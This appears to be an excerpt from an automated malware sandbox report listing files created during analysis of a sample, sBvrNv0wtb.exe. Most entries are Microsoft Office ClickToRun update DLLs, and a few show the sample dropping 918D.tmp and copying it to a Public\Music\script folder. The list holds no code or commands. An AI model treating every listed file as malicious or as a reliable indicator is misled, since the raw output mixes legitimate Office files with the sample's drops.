    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ko-kr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.en-gb.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\appvcleaner.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-gb.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R32.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIntegration.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.da-dk.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r64werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.vi-vn.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.uk-ua.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\inventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.et-ee.dll (copy)Jump to dropped file
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeFile created: C:\Users\user\AppData\Local\Temp\918D.tmpJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems32.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vcruntime140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.de-de.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sk-sk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.it-it.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.de-de.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.da-dk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ja-jp.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvVirtualization.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-mx.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ar-sa.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.lt-lt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hr-hr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nl-nl.dll (copy)Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpFile created: C:\Users\Public\Music\script\918D.tmp (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r32werhandler.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.id-id.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ko-kr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-fr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64_arm64x.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ru-ru.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hi-in.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\msix.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officeinventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-br.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.et-ee.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vccorlib140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.kk-kz.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ru-ru.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\offreg.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ar-sa.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.cs-cz.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVFileSystemMetadata.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.lv-lv.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVShNotify.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140_1.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R32.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.uk-ua.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-private-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.es-mx.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.tr-tr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVFileSystemMetadata.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvApi.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.en-us.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.bg-bg.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\concrt140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.zh-tw.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.tr-tr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-stdio-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeC2RClient.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVScripting.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.zh-cn.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.it-it.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\inventory.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIntegration.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.th-th.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\msvcp140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-tw.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVOrchestration.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-runtime-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lt-lt.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvStreamingManager.dll (copy)Jump to dropped file
